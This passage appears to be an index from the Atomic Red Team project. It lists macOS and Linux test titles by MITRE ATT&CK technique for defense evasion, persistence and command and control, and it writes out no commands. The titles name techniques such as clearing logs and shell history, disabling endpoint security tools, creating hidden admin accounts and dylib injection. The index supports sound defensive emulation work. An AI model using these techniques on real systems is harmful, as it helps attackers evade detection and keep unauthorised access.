- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Delete log files using built-in log utility [macos]
- Atomic Test #3: Truncate system log files via truncate utility [macos]
- Atomic Test #4: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- Atomic Test #5: System log file deletion via find utility [macos]
- Atomic Test #6: Overwrite macOS system log via echo utility [macos]
- Atomic Test #7: Real-time system log clearance/deletion [macos]
- Atomic Test #8: Delete system log files via unlink utility [macos]
- Atomic Test #9: Delete system log files using shred utility [macos]
- Atomic Test #10: Delete system log files using srm utility [macos]
- Atomic Test #11: Delete system log files using OSAScript [macos]
- Atomic Test #12: Delete system log files using Applescript [macos]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #8: XOR decoding and command execution using Python [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #3: Copy and Delete Mailbox Data on macOS [macos]
- Atomic Test #6: Copy and Modify Mailbox Data on macOS [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1647 Plist File Modification](../../T1647/T1647.md)
- Atomic Test #1: Plist Modification [macos]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #2: Create a user account on a MacOS system [macos]
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
